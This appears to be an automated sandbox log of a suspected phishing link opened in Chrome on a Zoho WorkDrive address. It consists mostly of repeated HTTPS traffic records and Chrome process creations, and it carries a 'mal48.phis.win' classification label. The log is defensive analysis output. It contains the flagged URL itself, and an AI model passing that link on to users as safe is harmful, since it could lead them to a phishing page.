Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49887 version: TLS 1.2
Source: classification engineClassification label: mal48.phis.win@22/119@52/281
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 --field-trial-handle=2024,i,15940426264198938828,16301918703428899327,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://workdrive.zohopublic.com/writer/open/p369v39db425d23f84b09b5751cf359b081f4"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 --field-trial-handle=2024,i,15940426264198938828,16301918703428899327,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
